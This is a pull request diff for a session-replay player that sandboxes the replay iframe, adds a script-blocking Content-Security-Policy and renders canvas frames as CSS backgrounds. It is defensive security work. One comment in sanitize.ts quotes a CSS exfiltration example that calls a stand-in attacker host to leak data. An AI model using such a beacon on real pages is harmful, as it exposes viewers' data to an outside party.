### PR TITLE
ui: add csp wrapper to player, add cssfill bg canvas rendering

### DIFF
--- a/player/src/web/Screen/Screen.ts
+++ b/player/src/web/Screen/Screen.ts
@@ -78,6 +78,10 @@ export default class Screen {
     iframe.className = styles.iframe;
     // These flags are fixed when the browsing
     // context is created, so this MUST be set before the iframe is attached.
+    // No allow-scripts: a crafted recording then can never execute JS in the
+    // app origin, whatever slips past sanitize.ts. That also disables scripting
+    // for the document, which stops <canvas> from painting its bitmap — see
+    // CanvasManager#paintFrame for how replayed canvases are rendered instead.
     iframe.setAttribute('sandbox', 'allow-same-origin');
     this.iframe = iframe;
 
@@ -187,6 +191,16 @@ export default class Screen {
 
   get window(): WindowProxy | null {
     return this.iframe.contentWindow;
+  }
+
+  /**
+   * Whether scripting is enabled for the replay document — i.e. whether a
+   * <canvas> in it will paint its bitmap at all. False under the sandbox above.
+   * See CanvasManager#paintFrame for why canvas replay needs to know.
+   */
+  get scriptingEnabled(): boolean {
+    const sandbox = this.iframe.getAttribute('sandbox');
+    return sandbox === null || sandbox.split(/\s+/).includes('allow-scripts');
   }
 
   get document(): Document | null {

--- a/player/src/web/TabManager.ts
+++ b/player/src/web/TabManager.ts
@@ -259,6 +259,7 @@ export default class TabSessionManager {
             [tarball, mp4file, framesFile],
             this.getNode as (id: number) => VElement | undefined,
             this.sessionStart,
+            !this.screen.scriptingEnabled,
           );
           this.canvasManagers[managerId] = {
             manager,

--- a/player/src/web/managers/CanvasManager.ts
+++ b/player/src/web/managers/CanvasManager.ts
@@ -43,6 +43,11 @@ export default class CanvasManager extends ListWalker<Timestamp> {
     private readonly links: [tar?: string, mp4?: string, frames?: string],
     private readonly getNode: (id: number) => VElement | undefined,
     private readonly sessionStart: number,
+    /**
+     * The replay document has scripting disabled, so the canvas bitmap is never
+     * painted and frames have to reach the screen another way. See paintFrame.
+     */
+    private readonly useCssPaint: boolean = false,
   ) {
     super();
     // try frames first, then tar, then mp4
@@ -186,16 +191,18 @@ export default class CanvasManager extends ListWalker<Timestamp> {
         if (node && node.node) {
           const canvasCtx = (node.node as HTMLCanvasElement).getContext('2d');
           const canvasEl = node.node as HTMLVideoElement;
-          requestAnimationFrame(() => {
-            canvasCtx?.clearRect(0, 0, canvasEl.width, canvasEl.height);
-            canvasCtx?.drawImage(
-              this.snapImage,
-              0,
-              0,
-              canvasEl.width,
-              canvasEl.height,
-            );
-          });
+          if (!this.useCssPaint) {
+            requestAnimationFrame(() => {
+              canvasCtx?.clearRect(0, 0, canvasEl.width, canvasEl.height);
+              canvasCtx?.drawImage(
+                this.snapImage,
+                0,
+                0,
+                canvasEl.width,
+                canvasEl.height,
+              );
+            });
+          }
           this.debugCanvas
             ?.getContext('2d')
             ?.drawImage(this.snapImage, 0, 0, 300, 200);
@@ -242,6 +249,25 @@ export default class CanvasManager extends ListWalker<Timestamp> {
           canvasEl.width,
           canvasEl.height,
         );
+        if (this.useCssPaint) {
+          // Unlike the snapshot modes there is no per-frame image to hand to
+          // paintFrame, so re-encode what was just drawn. Throttled to ~10fps by
+          // the 100ms guard above. Quality is high because this is a second
+          // lossy pass over already-lossy video frames; at these sizes the cost
+          // over 0.8 is ~20% more bytes, which never touch the network.
+          // The bitmap cannot be tainted (the video plays a same-origin blob
+          // URL), so toBlob will not fail on security grounds.
+          (node.node as HTMLCanvasElement).toBlob(
+            (blob) => {
+              if (!blob) return;
+              const url = URL.createObjectURL(blob);
+              this.paintFrame(url);
+              this.retainFrame(url);
+            },
+            'image/webp',
+            0.95,
+          );
+        }
       } else {
         console.error(`VideoMode CanvasManager: Node ${this.nodeId} not found`);
       }
@@ -249,17 +275,71 @@ export default class CanvasManager extends ListWalker<Timestamp> {
   };
 
   previousBlob: string = '';
+
+  private warnedMissingNode = false;
+
+  /**
+   * Render the current frame as the canvas element's CSS background.
+   *
+   * The replay iframe is sandboxed without allow-scripts (see Screen.ts), so
+   * scripting is disabled for its document — and per the HTML spec a <canvas>
+   * in a script-disabled document renders its *fallback content* instead of its
+   * bitmap. drawImage() still fills the bitmap (getImageData reads it straight
+   * back), nothing throws and nothing logs, so the canvas just silently stays
+   * blank. A CSS background is painted either way and reproduces drawImage's
+   * stretch-to-content-box geometry exactly.
+   *
+   * This and the bitmap path are mutually exclusive — only one of them can ever
+   * be visible, and doing both would decode every frame twice.
+   */
+  private paintFrame = (blobUrl: string) => {
+    const canvasEl = this.getNode(parseInt(this.nodeId, 10))?.node as
+      | HTMLCanvasElement
+      | undefined;
+    if (!canvasEl) {
+      // Once per manager: frames keep arriving, and a node that is merely late
+      // would otherwise flood the console.
+      if (!this.warnedMissingNode) {
+        this.warnedMissingNode = true;
+        console.error(`CanvasManager: Node ${this.nodeId} not found`);
+      }
+      return;
+    }
+    Object.assign(canvasEl.style, {
+      backgroundImage: `url("${blobUrl}")`,
+      backgroundSize: '100% 100%',
+      backgroundRepeat: 'no-repeat',
+      // The bitmap is painted into the content box, so anchor the background
+      // there too — otherwise a padded canvas would be offset against it.
+      backgroundOrigin: 'content-box',
+      backgroundClip: 'content-box',
+    });
+  };
+
+  /** Take ownership of the displayed frame and release the one it replaced. */
+  private retainFrame(blobUrl: string) {
+    const previous = this.previousBlob;
+    this.previousBlob = blobUrl;
+    if (previous && previous !== blobUrl) {
+      URL.revokeObjectURL(previous);
+    }
+  }
+
   moveReadySnap = (t: number) => {
     const msg = this.getNew(t);
     if (msg) {
       const file = this.snapshots[msg.time];
       if (file) {
         const blobUrl = file.getBlobUrl();
-        this.snapImage.src = blobUrl;
-        if (this.previousBlob) {
-          URL.revokeObjectURL(this.previousBlob);
+        if (this.useCssPaint) {
+          this.paintFrame(blobUrl);
         }
-        this.previousBlob = blobUrl;
+        // Decoding into the <img> is only worth it if something consumes it:
+        // the canvas bitmap, or the debug strip when it is switched on.
+        if (!this.useCssPaint || this.debugCanvas) {
+          this.snapImage.src = blobUrl;
+        }
+        this.retainFrame(blobUrl);
       }
     }
   };

--- a/player/src/web/managers/DOM/DOMManager.ts
+++ b/player/src/web/managers/DOM/DOMManager.ts
@@ -24,6 +24,7 @@ import {
 } from './VirtualDOM';
 import { deleteRule, insertRule } from './safeCSSRules';
 import {
+  REPLAY_CSP,
   REPLAY_IFRAME_SANDBOX,
   isForbiddenTag,
   sanitizeAttribute,
@@ -318,7 +319,11 @@ export default class DOMManager extends ListWalker<Message> {
           return;
         }
         doc.open();
-        doc.write('<!DOCTYPE html><html></html>');
+        // we write it here since otherwise it will be destroyyed on VDOM update
+        doc.write(
+          '<!DOCTYPE html><html><head><meta http-equiv="Content-Security-Policy" ' +
+            `content="${REPLAY_CSP}"></head></html>`,
+        );
         doc.close();
         const fRoot = doc.documentElement;
         fRoot.innerText = '';

--- a/player/src/web/managers/DOM/sanitize.ts
+++ b/player/src/web/managers/DOM/sanitize.ts
@@ -131,6 +131,46 @@ export function sanitizeAttribute(
 export const REPLAY_IFRAME_SANDBOX = 'allow-same-origin';
 
 /**
+ * Second, independent lock on script execution in the replay document, written
+ * into the bootstrap markup as a <meta http-equiv> (see DOMManager's
+ * CreateDocument). The sandbox above is the primary guarantee; this covers the
+ * case where the root iframe is ever created without it.
+ *
+ * Two properties make the meta form safe to rely on, both verified in Chrome:
+ * the policy is applied by the parser and *survives* both the subsequent
+ * `documentElement.innerText = ''` wipe (removing the meta element does not
+ * revoke an applied policy) and any later `doc.open()`. Nested replay iframes
+ * are `about:blank`, so they inherit this policy rather than needing their own.
+ *
+ * Note what is deliberately NOT here: `default-src`. Omitting it is the whole
+ * design. A directive that is absent imposes no restriction, so nothing about
+ * how a replay *renders* — images, styles, fonts, media, frames — can be broken
+ * by this policy. Adding `default-src` instead makes every unlisted directive
+ * fall back to it, and each fallback is a way to break replays for real:
+ * `default-src *` blocks `data:`/`blob:` (CSP's `*` covers network schemes only,
+ * so inlined images and canvas frames vanish) and, because it also backs
+ * `style-src`, it withholds `'unsafe-inline'` and every replay renders unstyled.
+ *
+ * So this restricts script-ish sinks only, where 'none' can never be too strict
+ * because a replay legitimately needs none of them. `worker-src` is listed
+ * because it falls back to `child-src`, not to `script-src`.
+ *
+ * Consequence worth knowing: CSS-based exfil (`background: url(https://attacker/
+ * ?leak)`) is NOT covered. Stopping that needs `img-src`/`style-src` pinned to
+ * the assets host — which is exactly the kind of rendering-critical directive
+ * this policy avoids, so it needs the real list of origins a replay pulls from
+ * plus a report-only rollout first.
+ */
+export const REPLAY_CSP = [
+  "script-src 'none'",
+  "worker-src 'none'",
+  "object-src 'none'",
+  "base-uri 'none'",
+  "form-action 'none'",
+  "connect-src 'none'",
+].join('; ');
+
+/**
  * Defense-in-depth scrub for CSS text (style tags, adopted stylesheets, inline
  * style). Modern browsers do not execute JS from CSS, but legacy/vendor
  * constructs (`expression()`, Firefox `-moz-binding: url(...)`) historically did.


### PR DESCRIPTION


<!-- This is an auto-generated description by cubic. -->
## Summary by cubic
Disable scripts in the replay iframe and add a CSP to lock down script-like sinks. Canvas frames still render by painting frames as CSS backgrounds when scripting is off.

- **New Features**
  - Sandbox replay iframe without `allow-scripts`; expose `screen.scriptingEnabled`.
  - Inject meta CSP (`REPLAY_CSP`) to block `script/worker/object/base-uri/form-action/connect`.
  - CanvasManager: add CSS background rendering path; pass `useCssPaint` from TabManager based on `scriptingEnabled`.
  - For video mode, re-encode drawn frames to WebP at ~10fps and manage blob URLs to avoid leaks.

<sup>Written for commit 21a79870636486c17a99c012260b1e3f7490df3b. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/openreplay/openreplay/pull/4807?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

